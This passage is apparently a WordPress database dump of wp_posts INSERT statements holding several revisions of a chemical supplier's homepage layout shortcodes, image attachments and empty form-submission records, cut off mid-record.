INSERT INTO `wp_posts` VALUES (4122, 1, '2017-05-01 16:18:58', '2017-05-01 16:18:58', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 16:18:58', '2017-05-01 16:18:58', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4123, 1, '2017-05-01 16:26:44', '2017-05-01 16:26:44', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="0"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n[text_box width="34" position_x="100"]\n\n[ux_image image_size="medium"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 16:26:44', '2017-05-01 16:26:44', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4124, 0, '2017-05-01 16:31:25', '2017-05-01 16:31:25', '', '', '', 'publish', 'closed', 'closed', '', '4124', '', '', '2017-05-01 16:31:25', '2017-05-01 16:31:25', '', 0, 'https://www.miller-stephenson.com/nf_sub/4124/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4125, 2, '2017-05-01 17:07:59', '2017-05-01 17:07:59', '', 'shutterstock_443216956', '', 'inherit', 'closed', 'closed', '', 'shutterstock_443216956', '', '', '2017-05-01 17:07:59', '2017-05-01 17:07:59', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_443216956.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4126, 2, '2017-05-01 17:08:47', '2017-05-01 17:08:47', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4125" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="0"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 17:08:47', '2017-05-01 17:08:47', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4127, 0, '2017-05-01 17:12:11', '2017-05-01 17:12:11', '', '', '', 'publish', 'closed', 'closed', '', '4127', '', '', '2017-05-01 17:12:12', '2017-05-01 17:12:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4127/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4128, 0, '2017-05-01 17:22:13', '2017-05-01 17:22:13', '', '', '', 'publish', 'closed', 'closed', '', '4128', '', '', '2017-05-01 17:22:13', '2017-05-01 17:22:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/4128/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4129, 2, '2017-05-01 17:32:50', '2017-05-01 17:32:50', '', 'shutterstock_94133023', '', 'inherit', 'closed', 'closed', '', 'shutterstock_94133023', '', '', '2017-05-01 17:32:50', '2017-05-01 17:32:50', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/shutterstock_94133023.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4130, 2, '2017-05-01 17:37:03', '2017-05-01 17:37:03', '', 'wire-picture', '', 'inherit', 'closed', 'closed', '', 'wire-picture', '', '', '2017-05-01 17:37:03', '2017-05-01 17:37:03', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/wire-picture.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4131, 2, '2017-05-01 17:37:35', '2017-05-01 17:37:35', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4130" bg_color="rgb(198, 215, 230)" bg_pos="90" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" scale="71" position_x="0" position_y="0"]\n\n[button text="Industrial & medical coatings" size="large" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box position_x="100" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-01 17:37:35', '2017-05-01 17:37:35', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4132, 2, '2017-05-01 17:39:56', '2017-05-01 17:39:56', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col 